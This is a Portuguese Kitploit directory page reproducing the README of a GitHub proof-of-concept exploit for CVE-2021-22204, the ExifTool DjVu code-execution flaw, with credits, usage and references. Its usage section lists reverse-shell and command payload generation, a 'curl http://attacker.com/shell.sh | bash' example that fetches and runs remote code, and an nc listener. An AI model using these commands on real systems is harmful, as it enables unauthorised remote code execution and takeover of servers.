Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-22204 — Exploit de RCE no ExifTool (CVE-2021-22204) - versão melhorada, sem dependência do exiftool | Kitploit
Ferramentas/GitHubGitHub/d4ytox/cve-2021-22204
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubd4ytox/cve-2021-22204

CVE-2021-22204

Exploit de RCE no ExifTool (CVE-2021-22204) - versão melhorada, sem dependência do exiftool

Ver Repositório
8há 18 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-22204 - ExifTool Execução Arbitrária de Código

Uma prova de conceito aprimorada para CVE-2021-22204, uma vulnerabilidade nas versões 7.44 a 12.23 do ExifTool que permite execução arbitrária de código ao processar arquivos DjVu maliciosos.

Créditos

Este é um trabalho derivado. A vulnerabilidade e o exploit original não são meus.

PapelQuem
Vulnerabilidade descoberta porWilliam Bowling (@wcbowling), reportada através do programa de bug bounty do GitLab — Abril de 2021
PoC original porUNICORD (NicPWNs & Dev-Yeoj)
Modificações neste repositório pord4ytox

Descrição

A neutralização inadequada de dados do usuário no formato de arquivo DjVu nas versões 7.44 a 12.23 do ExifTool permite execução arbitrária de código ao analisar uma imagem maliciosa. Este exploit gera um arquivo de imagem malicioso que, quando processado por uma versão vulnerável do ExifTool, executa código controlado pelo atacante.

O que esta versão altera

Com base em UNICORDev/exploit-CVE-2021-22204:

  • Sem dependência do ExifTool na máquina do atacante - O original usa exiftool -config para incorporar o payload, o que falha se o seu próprio ExifTool estiver corrigido (v12.24+). Esta versão constrói um payload DjVu puro usando apenas djvumake.
  • Funciona no Kali moderno - Compatível com Python 3.12+ (corrige o aviso de sequência de escape \c)
  • Dependências mínimas - Requer apenas o pacote djvulibre-bin
  • Código limpo e mínimo - Sem arte ASCII ou atrasos artificiais

Estas são alterações de engenharia em um exploit existente. Nenhuma pesquisa de vulnerabilidade é reivindicada.

Requisitos

root@kitploit:~
sudo apt install djvulibre-bin

Uso

Reverse Shell:

root@kitploit:~
python3 exploit.py -s <LHOST> <LPORT>

Comando Personalizado:

root@kitploit:~
python3 exploit.py -c "id > /tmp/pwned"

Exemplos:

root@kitploit:~
# Gerar payload de reverse shell
python3 exploit.py -s 192.168.1.100 4444

# Gerar payload de execução de comando  
python3 exploit.py -c "curl http://attacker.com/shell.sh | bash"

# Iniciar listener e aguardar callback
nc -nlvp 4444

O exploit gera image.jpg - envie este arquivo para um alvo onde o ExifTool irá processá-lo.

Versões Afetadas

  • ExifTool 7.44 - 12.23

Referências

  • Entrada NVD - CVE-2021-22204
  • Relatório original por William Bowling - HackerOne #1154542
  • Aviso do ExifTool
  • Commit do patch do ExifTool
  • PoC original - UNICORDev/exploit-CVE-2021-22204

Aviso Legal

Esta ferramenta é fornecida apenas para fins educacionais e de testes de segurança autorizados.

O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta. Use este exploit apenas contra sistemas que você possui ou para os quais tenha permissão escrita explícita para testar.

O acesso não autorizado a sistemas de computador é ilegal e punível por lei. Use com responsabilidade.

Licença

MIT, aplicando-se apenas às modificações neste repositório. O PoC upstream não possui licença, portanto permanece com todos os direitos reservados aos seus autores. Consulte LICENSE para o aviso completo de atribuição.

Baixar ferramenta